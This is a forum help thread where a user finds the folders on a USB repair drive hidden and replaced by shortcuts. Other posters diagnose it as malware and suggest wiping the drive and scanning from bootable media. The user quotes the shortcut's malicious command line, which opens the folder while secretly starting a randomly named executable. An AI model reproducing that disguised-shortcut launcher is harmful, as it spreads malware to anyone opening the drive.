 me
join:2002-12-08
Iapetus | Hidden foldersThe attribute of all my folders in my usb drive were changed to hidden. I use this USB drive to load programs into infected computers to fix them.
The folders were hidden then a shortcut was created for each.
Here is the shortcut code for a folder called "www.laplink.com"
%SystemRoot%\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%www.laplink.com & start %cd%BcTiRoODjxAsnVH.exe & exit"
I have already used the following to unhide the folders but is there anything else I should be concerned about?
attrib -H -S E:\*.* /S /D |
|
 CudniLa Merma - VigiladoPremium,MVM
join:2003-12-20
Someshire
kudos:13 | if you don't know what is
%cd%BcTiRoODjxAsnVH.exe
then it would of concern (it could be malware)
Cudni
--
"what we know we know the same, what we don't know, we don't know it differently."
Help yourself so God can help you.
Microsoft MVP, 2006 - 2012/13 |
|
 StuartMWWho Is John Galt?Premium
join:2000-08-06
Galt's Gulch
kudos:2 | I agree with Cudni  . That filename yells malware.
--
Don't feed trolls--it only makes them grow! |
|
davePremium,MVM
join:2000-05-04
not in ohio
kudos:8 | reply to Cudni
The %cd% is "current directory" - so it looks awfully like something's creating an .exe on the fly and then hoping it gets executed.
I'd say it was time to erase the entire disk and start again. Otherwise you'll never know whether you can trust the disk. And if this is supposed to be the trustworthy disk... |
|
 Name GamePremium
join:2002-07-07
North Myrtle Beach, SC
kudos:7 | On the usb do you have PCmover ?
The easiest way to
move to a new PC!
PCmover Professional automatically moves all the programs, files and settings you select from your old PC to your new one and all of your applications will be installed automatically ready to use.
PCmover is the easiest way to move into a new PC without leaving anything behind and works with almost any version of Windows. You can even use PCmover to transfer your PC to an Intel-based Mac using VMware Fusion, Parallels or Bootcamp.
--
Gladiator Security Forum
»www.gladiator-antivirus.com/
|
|
me
join:2002-12-08
Iapetus | reply to me
I am scanning it with everything but it comes up clean. |
|
Reviews:
 ·WestNet Broadband
|
Is this including bootable media not contained on your computer nor the USB drive?
IE. Via a CDC, DVD etc - there are plenty of bootable tools to scan with.
Also scan using Gmer or something similar for your computer, and report findings.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
|
|
|
|
me
join:2002-12-08
Iapetus | I have a few live cd antivirus programs I will try. |
|
Reviews:
·WestNet Broadband
| reply to Name Game
said by Name Game:On the usb do you have PCmover ?
The easiest way to
move to a new PC!
I see where you are going with that. Laplink has a few tools that maybe installed or utilized at some stage.
--
The only thing necessary for the triumph of evil is for good men to do nothing - Edmund Burke
|
|
